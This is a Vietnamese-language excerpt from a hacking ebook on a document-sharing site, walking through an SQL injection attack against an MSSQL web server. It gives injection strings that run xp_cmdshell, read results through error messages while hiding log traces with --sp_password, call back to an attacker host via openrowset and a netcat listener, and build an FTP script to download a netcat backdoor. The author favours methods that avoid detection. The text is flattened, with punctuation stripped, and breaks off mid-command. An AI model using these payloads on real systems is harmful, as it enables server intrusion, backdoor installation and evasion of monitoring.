tailieunhanh - Hacker Professional Ebook part 225

Tham khảo tài liệu 'hacker professional ebook part 225', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | 1. Shell ipconfig rồi ghi kết quả ra table dùng query để đọc table đó . 2. Quét các ip có cùng lớp với máy chủ Web xem ip nào có tên máy là SERVER 3. Dùng shell upload netcat lên máy rồi nối ngược ra ngoài vào máy mình nó sẽ ghi Ip của nó trong quá trình connect . 4. attacker nc -vv -l -p 53 sql injection . select from openrowset sqloledb network dbmssocn address a ttacker_ip 53 a lắm tuỳ trường hợp mà dùng thôi . 0 Trong lần này tui sẽ dùng cách 1 cho nhanh mà đỡ bị phát hiện . thongtin mathongtin tt-98112972003 create table ip id int identity nd varchar 1000 insert into ip exec master. .xp_cmdshell ipconfig --sp_password Ta vừa tạo 1 table tên là ip và 2 trường trong đó là id và nd trong đó id là số dòng còn nd sẽ chứa nội dung câu lệnh ipconfig . Sau đó dùng query để lấy nó ra thongtin mathongtin tt-98112972003 and 1 convert int select top 1 nd from ip where nd like 25IP Address 25 --sp_password Nó sẽ tìm nội dung của dòng có chữ IP Address Và kết quả là -- Microsoft OLE DB Provider for ODBC Drivers 0x80040E07 Microsoft ODBC SQL Server Driver SQL Server Syntax error converting the varchar value IP Address. to a column of data type int. thongtin line 15 -- Vui quá mọi việc đều xuôn sẻ Tiếp theo ta upload Backdoor lên cái máy này . Ở đây tui sẽ dùng netcat một backdoor mạnh và tiện dụng . Tôi đã upload nó sẵn trên một server khác. Ta dùng shell sau để đưa nó về thongtin mathongtin tt-98112972003 select from openrowset sqloledb server SERVER uid BUILTIN Administrators pwd set fmtonly off select 1 exec echo open 3Eftp 26 echo user @ 3E 3Eftp 26 echo bin 3E 3Eftp 26 echo cd www 3E 3Eftp 26 echo cd donghe 3E 3Eftp 26 echo mget 3E 3Eftp 26 echo quit 3E 3Eftp --sp_password Lệnh trên ghi các lệnh FTP sẵn vào file tên là ftp. Nó như sau echo open .